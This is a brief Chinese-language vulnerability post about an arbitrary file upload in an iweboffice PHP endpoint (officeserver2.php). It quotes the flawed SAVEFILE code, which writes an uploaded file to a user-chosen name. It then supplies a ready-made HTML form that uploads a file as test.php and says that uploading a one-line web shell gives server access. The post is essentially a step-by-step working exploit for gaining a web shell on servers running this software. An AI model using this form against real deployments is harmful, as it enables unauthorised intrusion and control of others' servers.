参考链接:https://bugs.shuimugan.com/bug/view?bug_no=125638
1.某文件多处任意文件上传,可直接getshell ,相关代码如下
case "SAVEFILE" :
$mRecordID = $RECORDID;
$mUserName = $USERNAME;
$mFileName = $FILENAME;
$mFileType = $FILETYPE;
$mDescript = $DESCRIPT;
$mFileDate = $FileDate;
$mFullPath = $mFilePath."/".$mFileName;
if ( is_uploaded_file( $_FILES['MsgFileBody']['tmp_name'] ) )
{
if ( move_uploaded_file( $_FILES['MsgFileBody']['tmp_name'], $mFullPath ) )
{
$mFileSize = $_FILES['MsgFileBody']['size'];
$result = true;
}
else
{
$MsgObj->MsgError( "Save File Error" );
$result = false;
}
}
2.我们要构造一份表单
OPTION为SAVEFILE,FILENAME是保存的文件名可以自己命名
<select>
<option value ="volvo">SAVEFILE</option>
</select>
<form method='post' action='/iweboffice/officeserver2.php?OPTION=SAVEFILE&FILENAME=test.php' enctype="multipart/form-data" >
<input type="file" name="MsgFileBody" style="height:20px;BORDER: #8F908B 1px solid;"/></br></br>
<button type=submit value="上传">上传</button> </form>
上传一句话木马即可获取webshell
网友评论